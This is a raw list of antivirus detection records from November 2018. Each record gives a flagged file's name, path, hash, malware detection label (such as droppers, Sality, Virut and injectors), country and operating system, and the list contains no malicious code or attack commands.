  Row(detection=Row(filename='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\1A9F85C83AB634E3B53BDEF15224BBB200CA065EC6C391AD9F8D6FC55180801A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a9f85c83ab634e3b53bdef15224bbb200ca065ec6c391ad9f8d6fc55180801a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164042-491f13a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60648797\\AVSCAN-20181102-164018-4598EC5A\\AVSCAN-20181102-164042-491F13A2', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='3d862099d9b548aa505eb39cab9fd8061c0c600a45bce604df67abbef4498314', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085646-bab46765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085634-B82D4EC1\\AVSCAN-20181102-085646-BAB46765', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c27f564eeff14974d20271de7eec57048d7609d0b9ca07a295b49f1b034f945', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-18\\0C27F564EEFF14974D20271DE7EEC57048D7609D0B9CA07A295B49F1B034F945', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='0c27f564eeff14974d20271de7eec57048d7609d0b9ca07a295b49f1b034f945', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:58:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\行銷管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='02da631777a3c2ca2d33853a06269f788e1d027e6de8e640798721363d6ffd6c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-070212-d5564fa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-070156-D2E347D7\\AVSCAN-20181102-070212-D5564FA4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hp1005sm.exe', filepath='C:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\HP1005SM.EXE', filesize=256000, name='W32/Sality.AT.#M0.#R0'), hash='03f0cccec3f36720a678078fca7cd6f794ff06061362c7807d59893e9c40d7a3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102908-b8119da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-102908-B8119DA5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\GNIEX70I7B\\uninstaller.exe', filesize=192000, name='ADWARE/EoRezo.Gen7.#M300.#R602706'), hash='2a966baf4067f0fe13d8452bc01488c35f700a28a200eff4dfd7c999096ab39c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T11:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T10:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081623-b38f4390', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a0c383b\\AVSCAN-20181102-081535-AE38ED0C\\AVSCAN-20181102-081623-B38F4390', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214718-00890dce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-214718-00890DCE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054712-b762e8e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054712-B762E8E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051933-da4fb864', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051933-DA4FB864', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eatemanager.exe', filepath='G:\\paku\\software\\imagine-v14.0-win-x86\\Repository\\IMAGINE x86\\Setup\\program files\\Intergraph\\ERDAS IMAGINE 2014\\bin\\win32release\\eATEManager.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='51ab5bc5d66a08f4fe27bfe643395c625db5d3e212fa620b3c0110b50c892935', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-02T06:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055225-71fc0edf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055225-71FC0EDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downtows.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\DOWNTOWS\\DOWNTOWS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053218-a226b268', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053218-A226B268', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061315-5ab1aa4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061315-5AB1AA4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='anakhmzh.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\AnAKhmZh.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055251-8172f5b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055251-8172F5B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052244-4c0717e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052244-4C0717E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055931-6fd8dbc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055931-6FD8DBC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060101-a56789f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060101-A56789F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055650-0fc70811', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055650-0FC70811', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050314-92b13a95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050314-92B13A95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='c:\\users\\X\\downloads\\setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052804-0b39cdff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052804-0B39CDFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055210-68a5d263', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055210-68A5D263', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100234-bc6d4990', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100234-BC6D4990', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122405-84fd1e06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122405-84FD1E06', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160732-4027fbed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160732-4027FBED', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052106-119df67c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052106-119DF67C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061934-3c8c0005', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061934-3C8C0005', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5e5a9c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5E5A9C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:34Z'), dt=datetime.date(2018, 11, 2)),
